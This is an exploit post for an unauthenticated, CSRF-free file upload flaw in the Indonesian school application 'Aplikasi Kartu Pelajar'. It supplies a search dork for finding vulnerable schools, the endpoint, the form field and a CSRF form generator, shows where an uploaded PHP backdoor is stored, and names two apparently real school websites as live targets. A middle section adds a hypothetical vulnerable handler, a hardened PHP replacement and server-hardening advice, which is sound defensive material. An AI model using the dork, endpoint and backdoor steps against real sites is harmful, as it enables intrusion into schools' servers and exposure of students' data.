Aplikasi Kartu Pelajar: Arbitrary File Upload Vulnerability with CSRF
January 13, 2021

Aplikasi Kartu Pelajar (a student-card application used by Indonesian schools): arbitrary file upload with no CSRF protection.
[+] Dork : intext:Responsive image aplikasi kartu pelajar site:sch.id
[+] Exploit : kartu.localcrot.sch.id/user/aksi/ubah_pelajar.php (kartu.localcrot.sch.id stands for any target host; the path is what matters)
If the response shows the alert "Data Berhasil di Ubah" ("data changed successfully"), the site is vulnerable: ubah_pelajar.php accepts the POST without a CSRF token and stores whatever file it is given, including PHP.
[+] CSRF :
https://tools.xploitsecid.or.id/Exploit/CSRF
postfile : gambar
The generator only builds an HTML form whose action is the target URL above and whose file input is named gambar (the "postfile" field); submit the file through that form.
[!] File Location :
The uploaded file is written, under its original name, into the img/ directory of the application root, e.g.
kartu.localcrot.sch.id/img/your_backdoor.php
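To show why the endpoint above behaves as described and what a fixed handler looks like, here is an added PHP example. It is not the application's source code: the first function is a hypothetical reconstruction that reproduces only the behaviour reported above (a file field named gambar, stored under its own name in img/, followed by the "Data Berhasil di Ubah" alert); the second is a hardened replacement. The session keys user_id and csrf_token, the 2 MB limit and the allowed image types are assumptions made for the example.

```php
<?php
// HYPOTHETICAL reconstruction of user/aksi/ubah_pelajar.php, matching
// the behaviour reported above. This is NOT the application's real code.
function vulnerable_ubah_pelajar(): void
{
    if (isset($_FILES['gambar'])) {
        // No session check, no CSRF token, no type or extension check,
        // and the client-chosen file name is kept: a .php upload lands in
        // img/ and is served as executable code.
        move_uploaded_file($_FILES['gambar']['tmp_name'],
                           __DIR__ . '/../../img/' . $_FILES['gambar']['name']);
    }
    echo "<script>alert('Data Berhasil di Ubah');</script>";
}

// Call when rendering the edit form; embed the returned token in a hidden
// <input name="csrf_token">. Session key name is an assumption.
function issue_csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hardened handler (added example, not the project's code).
function hardened_ubah_pelajar(): void
{
    session_start();

    // 1. Only an authenticated user may change student data.
    if (empty($_SESSION['user_id'])) {            // assumed session key
        http_response_code(403);
        exit('login required');
    }

    // 2. Reject cross-site posts: the form must carry the session token,
    //    compared in constant time.
    if (!isset($_POST['csrf_token'], $_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
        http_response_code(403);
        exit('bad csrf token');
    }

    // 3. Basic upload sanity: PHP's own upload status, size, and that the
    //    path really is a file PHP received via HTTP.
    if (!isset($_FILES['gambar']) || $_FILES['gambar']['error'] !== UPLOAD_ERR_OK) {
        http_response_code(400);
        exit('no file');
    }
    $tmp = $_FILES['gambar']['tmp_name'];
    if (!is_uploaded_file($tmp) || $_FILES['gambar']['size'] > 2 * 1024 * 1024) {
        http_response_code(400);
        exit('bad upload');
    }

    // 4. Decide the type from the content, never from the client-supplied
    //    name or Content-Type, and map it to an allow-listed extension.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!isset($allowed[$mime]) || getimagesize($tmp) === false) {
        http_response_code(400);
        exit('images only');
    }

    // 5. Discard the original name: random name, fixed extension, no
    //    execute bit. The client can no longer choose ".php".
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dir  = __DIR__ . '/../../img/';
    if (!move_uploaded_file($tmp, $dir . $name)) {
        http_response_code(500);
        exit('store failed');
    }
    chmod($dir . $name, 0644);

    // Record $name against the student row here (application-specific).
    echo "<script>alert('Data Berhasil di Ubah');</script>";
}
```

Even with the allow list, the img/ directory should be configured so the web server never executes scripts from it (for Apache, `php_flag engine off` in that directory; for nginx, a location block that serves img/ as static files only), so that a bypass of the content check still cannot yield code execution.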
[!] Live target : http://kartu.mit-alishlah.sch.id/user/aksi/ubah_pelajar.php
[!] My Target :
https://madarismiftahulhuda.com/kartu/